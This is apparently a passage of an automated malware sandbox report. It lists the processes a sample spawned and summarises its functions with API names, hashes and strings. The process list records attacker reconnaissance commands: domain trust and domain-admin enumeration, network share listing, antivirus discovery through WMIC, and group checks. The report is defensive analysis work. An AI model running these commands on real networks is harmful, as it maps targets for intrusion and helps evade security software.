                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:31
                                                                                                Start time:23:17:20
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:32
                                                                                                Start time:23:17:20
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\nltest.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:nltest /domain_trusts
                                                                                                Imagebase:0x7ff7fda60000
                                                                                                File size:540'672 bytes
                                                                                                MD5 hash:70E221CE763EA128DBA484B2E4903DE1
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:33
                                                                                                Start time:23:17:21
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:/c nltest /domain_trusts /all_trusts
                                                                                                Imagebase:0x7ff6a8f90000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:34
                                                                                                Start time:23:17:21
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:35
                                                                                                Start time:23:17:21
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\nltest.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:nltest /domain_trusts /all_trusts
                                                                                                Imagebase:0x7ff7fda60000
                                                                                                File size:540'672 bytes
                                                                                                MD5 hash:70E221CE763EA128DBA484B2E4903DE1
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:36
                                                                                                Start time:23:17:21
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:/c net view /all /domain
                                                                                                Imagebase:0x7ff6a8f90000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:37
                                                                                                Start time:23:17:21
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:38
                                                                                                Start time:23:17:21
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\net.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:net view /all /domain
                                                                                                Imagebase:0x7ff660440000
                                                                                                File size:59'904 bytes
                                                                                                MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:39
                                                                                                Start time:23:17:33
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:/c net view /all
                                                                                                Imagebase:0x7ff6a8f90000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:40
                                                                                                Start time:23:17:33
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:41
                                                                                                Start time:23:17:33
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\net.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:net view /all
                                                                                                Imagebase:0x7ff660440000
                                                                                                File size:59'904 bytes
                                                                                                MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:42
                                                                                                Start time:23:17:46
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:/c net group "Domain Admins" /domain
                                                                                                Imagebase:0x7ff6a8f90000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:43
                                                                                                Start time:23:17:46
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:44
                                                                                                Start time:23:17:46
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\net.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:net group "Domain Admins" /domain
                                                                                                Imagebase:0x7ff660440000
                                                                                                File size:59'904 bytes
                                                                                                MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:45
                                                                                                Start time:23:17:46
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\net1.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\net1 group "Domain Admins" /domain
                                                                                                Imagebase:0x7ff769ed0000
                                                                                                File size:183'808 bytes
                                                                                                MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:46
                                                                                                Start time:23:17:46
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:/Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
                                                                                                Imagebase:0x7ff75ebd0000
                                                                                                File size:576'000 bytes
                                                                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:47
                                                                                                Start time:23:17:46
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:48
                                                                                                Start time:23:17:46
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:/c net config workstation
                                                                                                Imagebase:0x7ff6a8f90000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:49
                                                                                                Start time:23:17:46
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:50
                                                                                                Start time:23:17:46
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\net.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:net config workstation
                                                                                                Imagebase:0x7ff660440000
                                                                                                File size:59'904 bytes
                                                                                                MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                Has elevated privileges:
                                                                                                Has administrator privileges:
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:51
                                                                                                Start time:23:17:46
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\net1.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\net1 config workstation
                                                                                                Imagebase:0x7ff769ed0000
                                                                                                File size:183'808 bytes
                                                                                                MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                Has elevated privileges:
                                                                                                Has administrator privileges:
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:52
                                                                                                Start time:23:17:47
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:/c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
                                                                                                Imagebase:0x7ff6a8f90000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:
                                                                                                Has administrator privileges:
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:53
                                                                                                Start time:23:17:47
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:
                                                                                                Has administrator privileges:
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:54
                                                                                                Start time:23:17:47
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
                                                                                                Imagebase:0x7ff75ebd0000
                                                                                                File size:576'000 bytes
                                                                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                Has elevated privileges:
                                                                                                Has administrator privileges:
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:55
                                                                                                Start time:23:17:47
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\findstr.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:findstr /V /B /C:displayName
                                                                                                Imagebase:0x7ff71f450000
                                                                                                File size:36'352 bytes
                                                                                                MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                Has elevated privileges:
                                                                                                Has administrator privileges:
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:56
                                                                                                Start time:23:17:48
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:/c whoami /groups
                                                                                                Imagebase:0x7ff6a8f90000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:
                                                                                                Has administrator privileges:
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:57
                                                                                                Start time:23:17:48
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:
                                                                                                Has administrator privileges:
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true


                                                                                                  Execution Graph

                                                                                                  Execution Coverage:0.1%
                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                  Signature Coverage:2.6%
                                                                                                  Total number of Nodes:38
                                                                                                  Total number of Limit Nodes:1

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual
                                                                                                  • String ID: &$58$KYZi$MhGL$k$o0+X$t!
                                                                                                  • API String ID: 4275171209-455283310
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual
                                                                                                  • String ID: &$58
                                                                                                  • API String ID: 4275171209-292207594
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual
                                                                                                  • String ID: &$58
                                                                                                  • API String ID: 4275171209-292207594
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual
                                                                                                  • String ID: &$58
                                                                                                  • API String ID: 4275171209-292207594
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual
                                                                                                  • String ID: &$58
                                                                                                  • API String ID: 4275171209-292207594
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLaststd::_std::exception_ptr::exception_ptr
                                                                                                  • String ID:
                                                                                                  • API String ID: 1155811620-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: File$Read$memset$Pointer$ErrorFreeHandleLastTask$AllocCloseCreateInformationLibrary
                                                                                                  • String ID: MsiDecomposeDescriptorW$\msi.dll
                                                                                                  • API String ID: 4003554184-1492151253
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: Filememmove$CloseHandlememset$Local$CreateCurrentDescriptorFreeMappingProcessSecurityViewWindow$AllocAppendCountDaclExecuteFindForegroundInitializeModuleNameObjectPathShellSingleSizeSleepThreadTickUnmapWaitrandsrandwsprintf
                                                                                                  • String ID: %u_%d_%d_%d_%u$..\360DeskAna64.exe$/%s %s %u$Progman$Program manager$open$se1$se2
                                                                                                  • API String ID: 1121195023-828389715
                                                                                                  • Opcode ID: bf27cba7947237ddb48d80a7ebe4eca32a8cf6ef406abc02a9deeb192b889f14
                                                                                                  • Instruction ID: 9c018b3ec5208d5dc303fe800ce77a7618bf785d2afa65f14d01c037d361c4e0
                                                                                                  • Opcode Fuzzy Hash: bf27cba7947237ddb48d80a7ebe4eca32a8cf6ef406abc02a9deeb192b889f14
                                                                                                  • Instruction Fuzzy Hash: D332CC72604B8886FB96CF25D8803DD73B1F789BD8F528116EA5947BA4DF38C649C708
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph (graph for the function starting at 1800655a8 not reproduced; legend: Executed / Not Executed)
                                                                                                  Similarity
                                                                                                  • API ID: Path$File$AppendExists$AddressProc$memset$CriticalLibraryLoadModuleNameSectionSleepValue$EnterHeapLeaveProcess
                                                                                                  • String ID: ..\..\360base64.dll$..\..\360conf64.dll$..\360base64.dll$..\360conf64.dll$360base64.dll$360conf64.dll$CreateObject$InitLibs$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe$\deepscan\360base64.dll$path
                                                                                                  • API String ID: 915540683-2864068223
                                                                                                  • Opcode ID: bdcb2047be7a0d43f9a5865a595f44413cc4095ddd18bc437aaa25b8a2dbd945
                                                                                                  • Instruction ID: d884d170d7a5308d36e8fcb93366518d72040e1886450bd247f02bd6a7684e11
                                                                                                  • Opcode Fuzzy Hash: bdcb2047be7a0d43f9a5865a595f44413cc4095ddd18bc437aaa25b8a2dbd945
                                                                                                  • Instruction Fuzzy Hash: 8EF17035214B4C92EA92DF25E8403DA73A2F78CBD5F549215FAAA436A4EF38C74DC740
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph (graph for the function starting at 180010580 not reproduced; legend: Executed / Not Executed)
                                                                                                  Similarity
                                                                                                  • API ID: memset$FilePath$Exists$BackslashCloseModuleNameOpenQueryValue
                                                                                                  • String ID: %s\%s$360SkinMgr.exe$360leakfixer.exe$Path$SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe$SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360sd.exe$hipsver.dll$safemon\360Cactus.tpi$safemon\FreeSaaS.tpi$safemon\pedrver.dll
                                                                                                  • API String ID: 4260417939-4002867936
                                                                                                  • Opcode ID: 69930986b2b6c6c437e187827024c0865ac4d7e0e25485b3d46344904dffa666
                                                                                                  • Instruction ID: bf4960b57fd98bc25e9fd953caee1d48b1d668c6bea79cfa729634ea3028d897
                                                                                                  • Opcode Fuzzy Hash: 69930986b2b6c6c437e187827024c0865ac4d7e0e25485b3d46344904dffa666
                                                                                                  • Instruction Fuzzy Hash: BCB13D31614E8895EBA2DB21EC543DA63A4F78DBC4F908116FA9D87A95EF39C70DC700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Similarity
                                                                                                  • API ID: memmove$memset$_errno
                                                                                                  • String ID: s$s
                                                                                                  • API String ID: 1013060226-2433928763
                                                                                                  • Opcode ID: 80b0ab6508d627de71779979219e21ca881affaedfde3055972eae66f5e13f87
                                                                                                  • Instruction ID: 1d7952d8602a8676256beffd8a10231c25a82f7a790c47b417b2fdc91bffeec8
                                                                                                  • Opcode Fuzzy Hash: 80b0ab6508d627de71779979219e21ca881affaedfde3055972eae66f5e13f87
                                                                                                  • Instruction Fuzzy Hash: E603C2727106898BE7B6CF29D444BE977A1F38C7C8F509119EA4657B84DF3ADA09CB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/, xrefs: 000000018003B0A7
                                                                                                  Similarity
                                                                                                  • API ID: ??2@??3@
                                                                                                  • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
                                                                                                  • API String ID: 1936579350-1713319389
                                                                                                  • Opcode ID: de07e1bc86237a5aca6dd0dfd658aa05e3ed97bf1d4081ac9606dc9f4cbeac81
                                                                                                  • Instruction ID: 78c147e4d1709cfe56d0b7305879f473f1c9ccde168616adeb7b08352c337043
                                                                                                  • Opcode Fuzzy Hash: de07e1bc86237a5aca6dd0dfd658aa05e3ed97bf1d4081ac9606dc9f4cbeac81
                                                                                                  • Instruction Fuzzy Hash: 8752EF32709B8889FB46CF65D5143EE27A1A3087D8F458621EB6E57BDADF79C249C300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Similarity
                                                                                                  • API ID: memmovememset$_errno$fegetenv
                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                  • API String ID: 2591457777-2761157908
                                                                                                  • Opcode ID: 88a9ba00e6e068890ed251e76263c28351ad1ff40a0f5855f604ac2084e58437
                                                                                                  • Instruction ID: f7af16447f6c096e4f5e386a29f6c1111b180ab9681df128fea2e8910a76382c
                                                                                                  • Opcode Fuzzy Hash: 88a9ba00e6e068890ed251e76263c28351ad1ff40a0f5855f604ac2084e58437
                                                                                                  • Instruction Fuzzy Hash: E8B2D672B011898AE7BA8F69D4447ED37A1F38C7C8F549115EA0A57B95DF3ACB08CB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                    • Part of subcall function 0000000180008C68: CharNextW.USER32 ref: 0000000180008CA7
                                                                                                    • Part of subcall function 0000000180008C68: CharNextW.USER32 ref: 0000000180008CD3
                                                                                                    • Part of subcall function 0000000180008C68: CharNextW.USER32 ref: 0000000180008D81
                                                                                                  • lstrcmpiW.KERNEL32(?,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 0000000180008EAC
                                                                                                  • lstrcmpiW.KERNEL32(?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 0000000180008EC6
                                                                                                  • CharNextW.USER32(?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 0000000180008F12
                                                                                                  • lstrcmpiW.KERNEL32(?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 0000000180008F3D
                                                                                                  • lstrcmpiW.KERNEL32(?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 0000000180008FCA
                                                                                                  • lstrcmpiW.KERNEL32(?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 0000000180008FF8
                                                                                                  • RegDeleteValueW.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 00000001800090D2
                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 00000001800090ED
                                                                                                  • CharNextW.USER32(?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 0000000180009118
                                                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 00000001800091D4
                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 00000001800091F0
                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 0000000180009224
                                                                                                  • RegQueryInfoKeyW.ADVAPI32 ref: 0000000180009403
                                                                                                  • lstrcmpiW.KERNEL32(?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 0000000180009423
                                                                                                  • RegQueryInfoKeyW.ADVAPI32 ref: 00000001800094A2
                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 00000001800094C2
                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A,?,?,00000000,00000000,?,0000000180009965), ref: 00000001800095D6
                                                                                                  • lstrcmpiW.KERNEL32(REGISTRY,00000000,?,?,00000000,00000000,?,0000000180009965), ref: 00000001800096CA
                                                                                                  • CoTaskMemFree.OLE32(REGISTRY,00000000,?,?,00000000,00000000,?,0000000180009965), ref: 00000001800097AC
                                                                                                  Similarity
                                                                                                  • API ID: lstrcmpi$CharCloseNext$InfoQuery$CreateDeleteFreeTaskValue
                                                                                                  • String ID: Delete$ForceRemove$NoRemove$REGISTRY$RegOpenKeyTransactedW$Val
                                                                                                  • API String ID: 2745146946-1115601298
                                                                                                  • Opcode ID: 56e9c84998ee59a6c392b319b6b82abac99081c69a027b1a44a57870dd930d6c
                                                                                                  • Instruction ID: ae6ecb7a7167c02cf6bf2ecb480314a04e234ded6d812639cd3a31308d1e7f2c
                                                                                                  • Opcode Fuzzy Hash: 56e9c84998ee59a6c392b319b6b82abac99081c69a027b1a44a57870dd930d6c
                                                                                                  • Instruction Fuzzy Hash: FF42C672B05B4586FB96CBA698403DE72E1BB8C7C4F54C125BE4987B98EF38C649C700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$Read$Pointer$CloseHandlememmove$??3@$ByteCharCreateMultiSizeWide_wcslwrwcschr
                                                                                                  • String ID: 9
                                                                                                  • API String ID: 2469906296-2366072709
                                                                                                  • Opcode ID: 1edc00ec3368a205bebbe676ef1486fb611a75b6483dacecd85243c6051295a2
                                                                                                  • Instruction ID: b16b18eef39a39b515becb99aaa5640e1c6952976385d86e077c0efac659451c
                                                                                                  • Opcode Fuzzy Hash: 1edc00ec3368a205bebbe676ef1486fb611a75b6483dacecd85243c6051295a2
                                                                                                  • Instruction Fuzzy Hash: 43D1D072300A8886EBA6DF25E8507ED37A1F749BD8F448614FE5647BA8DF38C249C700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
